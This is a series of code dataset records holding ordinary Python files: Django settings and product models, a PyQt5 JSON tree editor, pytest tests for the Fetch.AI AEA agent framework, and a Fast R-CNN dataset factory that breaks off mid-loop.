+{"seq_id":"479966171","text":"\"\"\"\nDjango settings for grubbing project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\nfrom grub_environment import GrubEnv\n\nge = GrubEnv()\n\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = ge.env('SECRET_KEY')\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = ge.env('DEBUG', False)\n\nTEMPLATE_DEBUG = ge.env('TEMPLATE_DEBUG', False)\n\nALLOWED_HOSTS = [ge.env('ALLOWED_HOSTS', '*')]\n\n# Application definition\n\nLOCAL_APPS = (\n 'grub',\n 'auth',\n)\n\nTHIRD_PARTY_APPS = (\n 'rest_framework',\n 'south',\n 'gunicorn',\n)\n\nDEFAULT_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.gis',\n)\n\nINSTALLED_APPS = DEFAULT_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'grubbing.urls'\n\nWSGI_APPLICATION = 'grubbing.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': ge.env('DB_ENGINE'),\n 'NAME': ge.env('DB_NAME'),\n 'USER': ge.env('DB_USER'),\n 'PASSWORD': ge.env('DB_PASS'),\n 'HOST': ge.env('DB_HOST')\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'es-VE'\n\nTIME_ZONE = 'America/Caracas'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nPOSTGIS_TEMPLATE = ge.env('POSTGIS_TEMPLATE', 'template_postgis')\nPOSTGIS_VERSION = (1, 5, 3)\n\nREST_FRAMEWORK = {\n 'PAGINATE_BY:': 10\n}\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': 'debug.log',\n },\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['file'],\n 'level': 'DEBUG',\n 'propagate': True,\n },\n },\n}\n","sub_path":"grubbing/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"237645435","text":"import json\r\nimport sys\r\nfrom mainwindow import Ui_MainWindow\r\nfrom settings import Ui_Dialog\r\nfrom treeview import Model, Delegate, Item\r\nfrom PyQt5 import QtWidgets, QtCore\r\n\r\nclass Settings(QtWidgets.QDialog):\r\n def __init__(self, parent, columns):\r\n super().__init__(parent)\r\n \r\n self.ui = Ui_Dialog()\r\n self.ui.setupUi(self)\r\n self.model = Model(self)\r\n self.model.insertColumns(0, ['column'])\r\n self.ui.listView.setModel(self.model)\r\n self.ui.listView.setItemDelegate(Delegate())\r\n self.ui.listView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\r\n self.ui.listView.customContextMenuRequested.connect(self.contextMenu)\r\n\r\n for column in columns:\r\n self.model.insertRows(self.model.root_item.childCount(), 1)\r\n child_item = self.model.root_item.child(-1)\r\n child_item.set_data('column', column)\r\n\r\n def add_item(self):\r\n self.model.insertRows(self.model.root_item.childCount(), 1)\r\n\r\n def columns(self):\r\n result = self.exec()\r\n data = self.model.data\r\n index = self.model.index\r\n columns = [ data(index(r, 0, QtCore.QModelIndex())) for r in range(self.model.rowCount()) ]\r\n return (columns, result == QtWidgets.QDialog.Accepted)\r\n \r\n def contextMenu(self, point):\r\n self.menu = QtWidgets.QMenu(self)\r\n self.menu.addAction('Add', self.add_item)\r\n self.menu.addAction('Delete', self.delete_item)\r\n self.menu.exec_( self.focusWidget().mapToGlobal(point) )\r\n \r\n def delete_item(self):\r\n indexes = self.ui.listView.selectedIndexes()\r\n for index in indexes:\r\n self.model.removeItem(index)\r\n\r\nclass MainWindow(QtWidgets.QMainWindow):\r\n def __init__(self, app):\r\n super().__init__()\r\n \r\n self.ui = Ui_MainWindow()\r\n self.ui.setupUi(self)\r\n\r\n self.model = Model(self)\r\n\r\n self.ui.treeView.setModel(self.model)\r\n self.ui.treeView.setItemDelegate(Delegate())\r\n self.ui.treeView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\r\n self.ui.treeView.customContextMenuRequested.connect(self.contextMenu)\r\n\r\n self.ui.actionAddChild.triggered.connect(self.add_child)\r\n self.ui.actionDelete.triggered.connect(self.delete_item)\r\n self.ui.actionOpen.triggered.connect(self.open_json)\r\n self.ui.actionSave.triggered.connect(self.save_json)\r\n self.ui.actionSettings.triggered.connect(self.show_settings_dialog)\r\n\r\n def show_settings_dialog(self):\r\n columns, result = Settings(self, self.model.columns()).columns()\r\n if not result:\r\n return\r\n self.model.removeColumns(0, self.model.columnCount())\r\n self.model.insertColumns(0, columns)\r\n\r\n def open_json(self, filename):\r\n\r\n def recursion(_part, _parent_index, _parts):\r\n _dict = { key:_part[key] for key in _part if not 'parts' == key }\r\n parent_item = _parent_index.internalPointer()\r\n if parent_item is None:\r\n parent_item = self.model.root_item\r\n self.model.insertRows(parent_item.childCount(), 1, _parent_index)\r\n child_item = parent_item.child(-1)\r\n child_item.set_dict(_dict)\r\n if 'parts' in _part:\r\n index = self.model.createIndex(parent_item.childCount(), 0, child_item)\r\n children = _part['parts']\r\n for child in children:\r\n recursion(child, index, parts)\r\n \r\n filename = QtWidgets.QFileDialog.getOpenFileName(self, 'Save file', '', 'JSON File (*.json)')\r\n if not filename[0]:\r\n return\r\n \r\n json_data = json.load( open(filename[0]) )\r\n self.model.removeColumns(0, self.model.columnCount())\r\n self.model.removeRows(0, self.model.root_item.childCount())\r\n self.model.insertColumns(0, json_data['columns'])\r\n\r\n parts = json_data['parts']\r\n for part in parts:\r\n recursion(part, QtCore.QModelIndex(), parts)\r\n \r\n def save_json(self):\r\n\r\n def recursion(parent):\r\n _dict1 = parent.dict\r\n if parent.childCount()==0:\r\n _dict1['parts'] = [ recursion(child) for child in parent.children() ]\r\n return _dict1\r\n \r\n parts = []\r\n for child in self.model.root_item.children():\r\n parts.append( recursion(child) )\r\n \r\n parts = {'columns':self.model.columns, 'parts':parts}\r\n\r\n filename = QtWidgets.QFileDialog.getSaveFileName(self, 'Save file', '', 'JSON File (*.json)')\r\n if filename[0]:\r\n json.dump(parts, open(filename[0],'w'), indent=4)\r\n\r\n def contextMenu(self, point):\r\n self.menu = QtWidgets.QMenu(self)\r\n self.menu.addAction('Add child', self.add_child)\r\n self.menu.addAction('Delete', self.delete_item)\r\n self.menu.exec_( self.focusWidget().mapToGlobal(point) )\r\n \r\n def add_child(self):\r\n indexes = self.ui.treeView.selectedIndexes()\r\n \r\n if len(indexes) == 0:\r\n self.model.insertRows(self.model.root_item.childCount(), 1, QtCore.QModelIndex())\r\n return\r\n \r\n indexes2 = []\r\n for index in indexes:\r\n if not index.row() in [ i.row() for i in indexes2 if i.parent() == index.parent() ]:\r\n indexes2.append(index)\r\n \r\n for index in indexes2:\r\n item = index.internalPointer()\r\n self.model.insertRows(item.childCount() + 1, 1, index)\r\n\r\n def delete_item(self):\r\n indexes = self.ui.treeView.selectedIndexes()\r\n\r\n if len(indexes) == 0:\r\n return\r\n\r\n indexes2 = []\r\n for index in indexes:\r\n if not index.row() in [ i.row() for i in indexes2 if i.parent() == index.parent() ]:\r\n indexes2.append(index)\r\n \r\n for index in indexes2:\r\n self.model.removeRows(index.row(), 1, index.parent())\r\n\r\ndef main():\r\n app = QtWidgets.QApplication(sys.argv)\r\n window = MainWindow(app)\r\n window.show()\r\n app.exec_()\r\n \r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"380382263","text":"from django.db import models\n\n\nclass Section(models.Model):\n name = models.CharField(max_length=128, verbose_name='Наименование раздела')\n slug = models.SlugField(max_length=128, unique=True)\n\n class Meta:\n verbose_name = 'Раздел'\n verbose_name_plural = 'Разделы'\n\n def __str__(self):\n return self.name\n\n\nclass Category(models.Model):\n name = models.CharField(max_length=128, verbose_name='Наименование категории')\n section = models.ForeignKey(\n Section,\n related_name='categories', on_delete=models.PROTECT, verbose_name='Раздел'\n )\n slug = models.SlugField(max_length=128, unique=True)\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n def __str__(self):\n return self.name\n\n\nclass Product(models.Model):\n name = models.CharField(max_length=128, verbose_name='Наименование')\n category = models.ForeignKey(\n Category,\n related_name='products', on_delete=models.PROTECT, verbose_name='Категория'\n )\n slug = models.SlugField(max_length=128, unique=True)\n image = models.ImageField(upload_to='img/products/', blank=True, verbose_name='Изображение')\n description = models.CharField(max_length=256, verbose_name='Описание')\n\n class Meta:\n verbose_name = 'Товар'\n verbose_name_plural = 'Товары'\n\n def __str__(self):\n return self.name\n\n\nclass Review(models.Model):\n product = models.ForeignKey(\n Product,\n related_name='reviews', on_delete=models.PROTECT, verbose_name='Товар'\n )\n name = models.CharField(max_length=128, verbose_name='Имя')\n content = models.TextField(verbose_name='Отзыв', default=False)\n rating = models.PositiveSmallIntegerField(verbose_name='Рейтинг')\n created = models.DateTimeField(auto_now_add=True, verbose_name='Дата и время создания')\n\n class Meta:\n verbose_name = 'Отзыв'\n verbose_name_plural = 'Отзывы'\n\n def __str__(self):\n return f'{self.name} {self.content[:30]}'\n","sub_path":"Diplom_django/products/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"172635861","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ------------------------------------------------------------------------------\n\"\"\"This module contains the tests for aea/aea.py.\"\"\"\n\nimport os\nimport tempfile\nimport time\nfrom pathlib import Path\nfrom threading import Thread\n\nimport pytest\n\nimport yaml\n\nfrom aea import AEA_DIR\nfrom aea.aea import AEA\nfrom aea.configurations.base import ProtocolConfig, PublicId\nfrom aea.connections.stub.connection import StubConnection\nfrom aea.crypto.fetchai import FETCHAI\nfrom aea.crypto.ledger_apis import LedgerApis\nfrom aea.crypto.wallet import Wallet\nfrom aea.identity.base import Identity\nfrom aea.mail.base import Envelope\nfrom aea.protocols.base import Protocol\nfrom aea.protocols.default.message import DefaultMessage\nfrom aea.protocols.default.serialization import DefaultSerializer\nfrom aea.registries.base import Resources\nfrom aea.skills.base import Skill\n\nfrom packages.fetchai.connections.local.connection import LocalNode, OEFLocalConnection\nfrom packages.fetchai.protocols.fipa.message import FIPAMessage\nfrom packages.fetchai.protocols.fipa.serialization import FIPASerializer\n\nfrom .conftest import (\n CUR_PATH,\n DUMMY_SKILL_PUBLIC_ID,\n LOCAL_CONNECTION_PUBLIC_ID,\n UNKNOWN_PROTOCOL_PUBLIC_ID,\n)\nfrom .data.dummy_aea.skills.dummy.tasks import DummyTask # type: ignore\nfrom .data.dummy_skill.behaviours import DummyBehaviour # type: ignore\n\n\ndef test_initialise_aea():\n \"\"\"Tests the initialisation of the AEA.\"\"\"\n node = LocalNode()\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n identity = Identity(\"my_name\", address=wallet.addresses[FETCHAI])\n connections1 = [\n OEFLocalConnection(\n identity.address, node, connection_id=OEFLocalConnection.connection_id\n )\n ]\n ledger_apis = LedgerApis({}, FETCHAI)\n my_AEA = AEA(\n identity,\n connections1,\n wallet,\n ledger_apis,\n resources=Resources(str(Path(CUR_PATH, \"aea\"))),\n )\n assert my_AEA.context == my_AEA._context, \"Cannot access the Agent's Context\"\n assert (\n not my_AEA.context.connection_status.is_connected\n ), \"AEA should not be connected.\"\n my_AEA.setup()\n assert my_AEA.resources is not None, \"Resources must not be None after setup\"\n my_AEA.resources = Resources(str(Path(CUR_PATH, \"aea\")))\n assert my_AEA.resources is not None, \"Resources must not be None after set\"\n assert (\n my_AEA.context.shared_state is not None\n ), \"Shared state must not be None after set\"\n assert my_AEA.context.task_manager is not None\n assert my_AEA.context.identity is not None, \"Identity must not be None after set.\"\n my_AEA.stop()\n\n\ndef test_act():\n \"\"\"Tests the act function of the AEA.\"\"\"\n with LocalNode() as node:\n agent_name = \"MyAgent\"\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n identity = Identity(agent_name, address=wallet.addresses[FETCHAI])\n ledger_apis = LedgerApis({}, FETCHAI)\n connections = [\n OEFLocalConnection(\n identity.address, node, connection_id=LOCAL_CONNECTION_PUBLIC_ID\n )\n ]\n resources = Resources(str(Path(CUR_PATH, \"data\", \"dummy_aea\")))\n\n agent = AEA(\n identity, connections, wallet, ledger_apis, resources, is_programmatic=False\n )\n t = Thread(target=agent.start)\n try:\n t.start()\n time.sleep(1.0)\n\n behaviour = agent.resources.behaviour_registry.fetch(\n (DUMMY_SKILL_PUBLIC_ID, \"dummy\")\n )\n assert behaviour.nb_act_called > 0, \"Act() wasn't called\"\n finally:\n agent.stop()\n t.join()\n\n\ndef test_react():\n \"\"\"Tests income messages.\"\"\"\n with LocalNode() as node:\n agent_name = \"MyAgent\"\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n identity = Identity(agent_name, address=wallet.addresses[FETCHAI])\n ledger_apis = LedgerApis({}, FETCHAI)\n connection = OEFLocalConnection(\n identity.address, node, connection_id=LOCAL_CONNECTION_PUBLIC_ID\n )\n connections = [connection]\n resources = Resources(str(Path(CUR_PATH, \"data\", \"dummy_aea\")))\n\n msg = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n msg.counterparty = identity.address\n message_bytes = DefaultSerializer().encode(msg)\n\n envelope = Envelope(\n to=identity.address,\n sender=identity.address,\n protocol_id=DefaultMessage.protocol_id,\n message=message_bytes,\n )\n\n agent = AEA(\n identity, connections, wallet, ledger_apis, resources, is_programmatic=False\n )\n t = Thread(target=agent.start)\n try:\n t.start()\n time.sleep(1.0)\n agent.outbox.put(envelope)\n time.sleep(2.0)\n default_protocol_public_id = DefaultMessage.protocol_id\n dummy_skill_public_id = DUMMY_SKILL_PUBLIC_ID\n handler = agent.resources.handler_registry.fetch_by_protocol_and_skill(\n default_protocol_public_id, dummy_skill_public_id\n )\n assert handler is not None, \"Handler is not set.\"\n assert (\n msg in handler.handled_messages\n ), \"The message is not inside the handled_messages.\"\n except Exception:\n raise\n finally:\n agent.stop()\n t.join()\n\n\n@pytest.mark.asyncio\nasync def test_handle():\n \"\"\"Tests handle method of an agent.\"\"\"\n with LocalNode() as node:\n agent_name = \"MyAgent\"\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n ledger_apis = LedgerApis({}, FETCHAI)\n identity = Identity(agent_name, address=wallet.addresses[FETCHAI])\n connection = OEFLocalConnection(\n identity.address, node, connection_id=DUMMY_SKILL_PUBLIC_ID\n )\n connections = [connection]\n resources = Resources(str(Path(CUR_PATH, \"data\", \"dummy_aea\")))\n\n msg = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n msg.counterparty = agent_name\n message_bytes = DefaultSerializer().encode(msg)\n\n envelope = Envelope(\n to=identity.address,\n sender=identity.address,\n protocol_id=UNKNOWN_PROTOCOL_PUBLIC_ID,\n message=message_bytes,\n )\n\n agent = AEA(\n identity, connections, wallet, ledger_apis, resources, is_programmatic=False\n )\n t = Thread(target=agent.start)\n try:\n t.start()\n time.sleep(2.0)\n dummy_skill = agent.resources.get_skill(DUMMY_SKILL_PUBLIC_ID)\n dummy_handler = dummy_skill.handlers[\"dummy\"]\n\n expected_envelope = envelope\n agent.outbox.put(expected_envelope)\n time.sleep(2.0)\n assert len(dummy_handler.handled_messages) == 1\n\n # DECODING ERROR\n msg = \"hello\".encode(\"utf-8\")\n envelope = Envelope(\n to=identity.address,\n sender=identity.address,\n protocol_id=DefaultMessage.protocol_id,\n message=msg,\n )\n expected_envelope = envelope\n agent.outbox.put(expected_envelope)\n time.sleep(2.0)\n assert len(dummy_handler.handled_messages) == 2\n\n # UNSUPPORTED SKILL\n msg = FIPASerializer().encode(\n FIPAMessage(\n performative=FIPAMessage.Performative.ACCEPT,\n message_id=0,\n dialogue_reference=(str(0), \"\"),\n target=1,\n )\n )\n envelope = Envelope(\n to=identity.address,\n sender=identity.address,\n protocol_id=FIPAMessage.protocol_id,\n message=msg,\n )\n expected_envelope = envelope\n agent.outbox.put(expected_envelope)\n time.sleep(2.0)\n assert len(dummy_handler.handled_messages) == 3\n\n finally:\n agent.stop()\n t.join()\n\n\nclass TestInitializeAEAProgrammaticallyFromResourcesDir:\n \"\"\"Test that we can initialize the agent by providing the resource object loaded from dir.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Set the test up.\"\"\"\n cls.node = LocalNode()\n cls.node.start()\n cls.agent_name = \"MyAgent\"\n cls.private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n cls.wallet = Wallet({FETCHAI: cls.private_key_path})\n cls.ledger_apis = LedgerApis({}, FETCHAI)\n cls.identity = Identity(cls.agent_name, address=cls.wallet.addresses[FETCHAI])\n cls.connection = OEFLocalConnection(\n cls.agent_name, cls.node, connection_id=LOCAL_CONNECTION_PUBLIC_ID,\n )\n cls.connections = [cls.connection]\n\n cls.resources = Resources(os.path.join(CUR_PATH, \"data\", \"dummy_aea\"))\n cls.aea = AEA(\n cls.identity,\n cls.connections,\n cls.wallet,\n cls.ledger_apis,\n cls.resources,\n is_programmatic=False,\n )\n\n cls.expected_message = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n cls.expected_message.counterparty = cls.agent_name\n envelope = Envelope(\n to=cls.agent_name,\n sender=cls.agent_name,\n protocol_id=DefaultMessage.protocol_id,\n message=DefaultSerializer().encode(cls.expected_message),\n )\n\n cls.t = Thread(target=cls.aea.start)\n cls.t.start()\n\n time.sleep(0.5)\n cls.aea.outbox.put(envelope)\n time.sleep(0.5)\n\n def test_initialize_aea_programmatically(self):\n \"\"\"Test that we can initialize an AEA programmatically.\"\"\"\n dummy_skill_id = DUMMY_SKILL_PUBLIC_ID\n dummy_behaviour_name = \"dummy\"\n dummy_behaviour = self.aea.resources.behaviour_registry.fetch(\n (dummy_skill_id, dummy_behaviour_name)\n )\n assert dummy_behaviour is not None\n assert dummy_behaviour.nb_act_called > 0\n\n # TODO the previous code caused an error:\n # _pickle.PicklingError: Can't pickle : import of module 'tasks' failed\n dummy_task = DummyTask()\n task_id = self.aea.task_manager.enqueue_task(dummy_task)\n async_result = self.aea.task_manager.get_task_result(task_id)\n expected_dummy_task = async_result.get(2.0)\n assert expected_dummy_task.nb_execute_called > 0\n\n dummy_handler = self.aea.resources.handler_registry.fetch_by_protocol_and_skill(\n DefaultMessage.protocol_id, dummy_skill_id\n )\n dummy_handler_alt = self.aea.resources.handler_registry.fetch(\n (dummy_skill_id, \"dummy\")\n )\n assert dummy_handler == dummy_handler_alt\n assert dummy_handler is not None\n assert len(dummy_handler.handled_messages) == 1\n assert dummy_handler.handled_messages[0] == self.expected_message\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Tear the test down.\"\"\"\n cls.aea.stop()\n cls.t.join()\n cls.node.stop()\n\n\nclass TestInitializeAEAProgrammaticallyBuildResources:\n \"\"\"Test that we can initialize the agent by building the resource object.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Set the test up.\"\"\"\n cls.node = LocalNode()\n cls.node.start()\n cls.agent_name = \"MyAgent\"\n cls.private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n cls.wallet = Wallet({FETCHAI: cls.private_key_path})\n cls.ledger_apis = LedgerApis({}, FETCHAI)\n cls.identity = Identity(cls.agent_name, address=cls.wallet.addresses[FETCHAI])\n cls.connection = OEFLocalConnection(\n cls.agent_name, cls.node, connection_id=LOCAL_CONNECTION_PUBLIC_ID\n )\n cls.connections = [cls.connection]\n\n cls.temp = tempfile.mkdtemp(prefix=\"test_aea_resources\")\n cls.resources = Resources(cls.temp)\n cls.aea = AEA(\n cls.identity,\n cls.connections,\n cls.wallet,\n cls.ledger_apis,\n resources=cls.resources,\n )\n\n default_protocol_id = DefaultMessage.protocol_id\n\n cls.default_protocol_configuration = ProtocolConfig.from_json(\n yaml.safe_load(open(Path(AEA_DIR, \"protocols\", \"default\", \"protocol.yaml\")))\n )\n cls.default_protocol = Protocol(\n default_protocol_id, DefaultSerializer(), cls.default_protocol_configuration\n )\n cls.resources.protocol_registry.register(\n default_protocol_id, cls.default_protocol\n )\n\n cls.error_skill = Skill.from_dir(\n Path(AEA_DIR, \"skills\", \"error\"), cls.aea.context\n )\n cls.dummy_skill = Skill.from_dir(\n Path(CUR_PATH, \"data\", \"dummy_skill\"), cls.aea.context\n )\n cls.resources.add_skill(cls.dummy_skill)\n cls.resources.add_skill(cls.error_skill)\n\n cls.expected_message = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n cls.expected_message.counterparty = cls.agent_name\n\n cls.t = Thread(target=cls.aea.start)\n cls.t.start()\n time.sleep(0.5)\n\n cls.aea.outbox.put(\n Envelope(\n to=cls.agent_name,\n sender=cls.agent_name,\n protocol_id=default_protocol_id,\n message=DefaultSerializer().encode(cls.expected_message),\n )\n )\n\n def test_initialize_aea_programmatically(self):\n \"\"\"Test that we can initialize an AEA programmatically.\"\"\"\n time.sleep(0.5)\n\n dummy_skill_id = DUMMY_SKILL_PUBLIC_ID\n dummy_behaviour_name = \"dummy\"\n dummy_behaviour = self.aea.resources.behaviour_registry.fetch(\n (dummy_skill_id, dummy_behaviour_name)\n )\n assert dummy_behaviour is not None\n assert dummy_behaviour.nb_act_called > 0\n\n dummy_task = DummyTask()\n task_id = self.aea.task_manager.enqueue_task(dummy_task)\n async_result = self.aea.task_manager.get_task_result(task_id)\n expected_dummy_task = async_result.get(2.0)\n assert expected_dummy_task.nb_execute_called > 0\n\n dummy_handler_name = \"dummy\"\n dummy_handler = self.aea.resources.handler_registry.fetch(\n (dummy_skill_id, dummy_handler_name)\n )\n dummy_handler_alt = self.aea.resources.handler_registry.fetch_by_protocol_and_skill(\n DefaultMessage.protocol_id, dummy_skill_id\n )\n assert dummy_handler == dummy_handler_alt\n assert dummy_handler is not None\n assert len(dummy_handler.handled_messages) == 1\n assert dummy_handler.handled_messages[0] == self.expected_message\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Tear the test down.\"\"\"\n cls.aea.stop()\n cls.t.join()\n cls.node.stop()\n Path(cls.temp).rmdir()\n\n\nclass TestAddBehaviourDynamically:\n \"\"\"Test that we can add a behaviour dynamically.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Set the test up.\"\"\"\n agent_name = \"MyAgent\"\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n ledger_apis = LedgerApis({}, FETCHAI)\n resources = Resources(str(Path(CUR_PATH, \"data\", \"dummy_aea\")))\n identity = Identity(agent_name, address=wallet.addresses[FETCHAI])\n cls.input_file = tempfile.mkstemp()[1]\n cls.output_file = tempfile.mkstemp()[1]\n cls.agent = AEA(\n identity,\n [StubConnection(cls.input_file, cls.output_file)],\n wallet,\n ledger_apis,\n resources,\n is_programmatic=False,\n )\n\n cls.t = Thread(target=cls.agent.start)\n cls.t.start()\n time.sleep(1.0)\n\n def test_add_behaviour_dynamically(self):\n \"\"\"Test the dynamic registration of a behaviour.\"\"\"\n dummy_skill_id = PublicId(\"dummy_author\", \"dummy\", \"0.1.0\")\n dummy_skill = self.agent.resources.get_skill(dummy_skill_id)\n assert dummy_skill is not None\n new_behaviour = DummyBehaviour(\n name=\"dummy2\", skill_context=dummy_skill.skill_context\n )\n dummy_skill.skill_context.new_behaviours.put(new_behaviour)\n time.sleep(1.0)\n assert new_behaviour.nb_act_called > 0\n assert (\n len(self.agent.resources.behaviour_registry.fetch_by_skill(dummy_skill_id))\n == 2\n )\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Tear the class down.\"\"\"\n cls.agent.stop()\n cls.t.join()\n Path(cls.input_file).unlink()\n Path(cls.output_file).unlink()\n","sub_path":"tests/test_aea.py","file_name":"test_aea.py","file_ext":"py","file_size_in_byte":18486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"515654467","text":"# --------------------------------------------------------\n# Fast R-CNN\n# Copyright (c) 2015 Microsoft\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Ross Girshick\n# --------------------------------------------------------\n\n\"\"\"Factory method for easily getting imdbs by name.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom datasets.pascal_voc import pascal_voc\nfrom datasets.coco import coco\nfrom datasets.imagenet import imagenet\nfrom datasets.vg import vg\nfrom datasets.food import food\nfrom datasets.food_data import food_merge_imdb\nfrom datasets.school_lunch import school_lunch\nfrom datasets.food_meta_data import food_meta_imdb\n\n__sets = {}\n\nfor canteen in [\"Arts\"]:\n for split in ['train', 'test']:\n name = 'food_meta_{}_{}'.format(canteen, split)\n categories = \"{}_trainval\".format(canteen)\n __sets[name] = (lambda split=split, canteen=canteen:\n food_meta_imdb(split, canteen, categories))\n\n# Set up food___\nsplits = ['train', 'val', 'trainval', 'inner', 'test']\nmt_splits = []\nfor n in [0, 10, 30, 50, 100]:\n for s in splits:\n mt_splits += [s+\"mt{}\".format(n)]\nsplits += mt_splits\n\ninnersplit = []\nfor sp in ['val', 'test']:\n for m in [10, 30, 50]:\n innersplit.append('innermt{}{}'.format(m, sp))\n\nsplits += innersplit\n\n# take few sample in inner between dataset of canteen and dataset of excl canteen as training data. And regard the lefts as validation.\ninner_few = []\nfor fewN in [0, 1, 3, 5, 10]:\n for mtN in [10]:\n for d in ['train', 'val', 'test']:\n inner_few += [\"innerfew{}mt{}{}\".format(fewN, mtN, d)]\nsplits += inner_few\n\nfor cantee in ['exclYIH', \"All\", \"exclArts\", \"exclUTown\", \"Science\", \"exclScience\", \"exclTechChicken\", \"exclTechMixedVeg\", \"YIH\", \"Arts\", \"TechChicken\", \"TechMixedVeg\", \"UTown\", \"EconomicBeeHoon\"]:\n for split in splits:\n for category in ['exclYIH', \"All\", \"exclArts\", \"exclUTown\", \"Science\", \"exclScience\", \"exclTechChicken\", \"exclTechMixedVeg\", \"YIH\", \"Arts\", \"TechChicken\", \"TechMixedVeg\", \"UTown\", \"EconomicBeeHoon\"]:\n category_train = category + '_train'\n name = 'food_{}_{}_{}'.format(cantee, split, category_train)\n __sets[name] = (lambda split=split,\n cantee=cantee, category_train=category_train: food_merge_imdb(split, cantee, category_train))\n for n in [10, 30, 50, 100]:\n category_mt10 = category + '_train_mt{}'.format(n)\n name = 'food_{}_{}_{}'.format(cantee, split, category_mt10)\n __sets[name] = (lambda split=split,\n cantee=cantee, category_mt10=category_mt10: food_merge_imdb(split, cantee, category_mt10))\n\n#__sets[\"Food_EconomicBeeHoon_train\"] = food_meta_imdb(train, )\n\n# Set up school lunch\nfor split in ['train', 'val', 'trainval', 'test']:\n name = 'schoollunch_{}'.format(split)\n __sets[name] = (lambda split=split: school_lunch(split))\n# Set up voc__\nfor year in ['2007', '2012']:\n for split in ['train', 'val', 'trainval', 'test']:\n name = 'voc_{}_{}'.format(year, split)\n __sets[name] = (lambda split=split, year=year: pascal_voc(split, year))\n\n# Set up coco_2014_\nfor year in ['2014']:\n for split in ['train', 'val', 'minival', 'valminusminival', 'trainval']:\n name = 'coco_{}_{}'.format(year, split)\n __sets[name] = (lambda split=split, year=year: coco(split, year))\n\n# Set up coco_2014_cap_\nfor year in ['2014']:\n for split in ['train', 'val', 'capval', 'valminuscapval', 'trainval']:\n 